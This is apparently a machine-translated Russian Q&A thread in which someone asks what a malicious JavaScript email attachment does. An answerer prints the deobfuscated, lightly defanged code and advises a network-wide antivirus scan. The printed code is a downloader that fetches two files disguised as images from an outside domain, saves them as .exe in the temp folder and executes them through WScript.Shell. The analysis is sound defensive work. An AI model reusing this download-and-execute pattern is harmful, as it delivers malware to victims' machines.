2015-03-13 5 views
-7

Если кто-нибудь знает, что происходит в этом файле сценария java, не могли бы вы рассказать мне? Клиент нашего получил это как электронную почту и хорошо ... Теперь она не может открыть какие-либо документы или электронные таблицы. Также похоже, что он распространяется на остальную часть сети.Нужна помощь в выяснении того, что делает этот Js

Если кто-то может помочь мне разобраться в этом, я был бы очень благодарен.

Я удалил его, а не то, что я хочу, чтобы кто-то еще смог овладеть.

Возможно, мне не нужно никому говорить, но , пожалуйста, не открывайте его, если он не находится в песочнице. Я не несу ответственность за то, что вы кирпич ваш ПК.

Источник: PM меня для файла, а ..

+0

он использует 'WScript.Shell' сделать что-то, не уверен, что все же, плохо выглядеть в него – epoch

+0

Образцы в таким образом, к тому, что вы считаете вирусом, небрежно. Я надеюсь, что большинство людей прочитают, прежде чем нажимать, и что они не позволяют активному контенту запускать из неизвестных доменов. – Mackan

+0

Я не понимаю, почему это становится так много downvotes, если у вас есть ноу-хау, это интересная вещь для решения, учитывая, что это, вероятно, не самый лучший вопрос, чтобы задать здесь ... – epoch

ответ

3

В основном, это скачивание вируса в папку темпа и выполнение его ...

Вы должны запустить антивирусную проверку по всей сети.

var AxProxy = function() {}; 

(function() { 
    function fFh(fr, Klw, rn) { 
     var VeZ = new AxProxy('WScript.Shell'); 
     var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw; 
     var OG4 = new AxProxy('MSXML2.XMLHTTP'); 

     OG4['onReadyStateChange'] = function() { 
      if (OG4['readyState'] === 4) { 
       var g38 = new AxProxy('ADODB.Stream'); 

       g38['open'](); 
       g38['type'] = 1; 
       g38['write'](OG4['ResponseBody']); 
       g38['position'] = 0; 
       g38['saveToFile'](Klw, 2); 
       g38['close'](); 
      } 
     }; 

     try { 
      OG4['open']('GET', fr, false); 
      OG4['send'](); 

      if (rn > 0) { 
       VeZ['Run'](Klw, 0, 0); 
      } 
     } catch (er) {}; 
    } 

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1); 
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1); 
}(); 

Все остальные переменные - это просто тарабарщина, предназначенная для путаницы и обескуражения декодирования.

PS: Я проксированном ActiveXObject так что это не может быть запущен ...

+1

Эпоха, если бы у меня было достаточно репутации, я бы это сделал. Спасибо, чувак, ты действительно помог мне с этим. Это было ТОЧНО, что я искал. –

+0

no probs man :) Я думаю, вы все еще можете принять (с иконкой галочки). надеюсь, что вы исправите свой компьютер :) – epoch

+1

Ха-ха. Да, его гона займет некоторое время: P Но сено! По крайней мере, теперь я знаю, что им нужно. Благодаря претории boyjie! #Capetownproblems –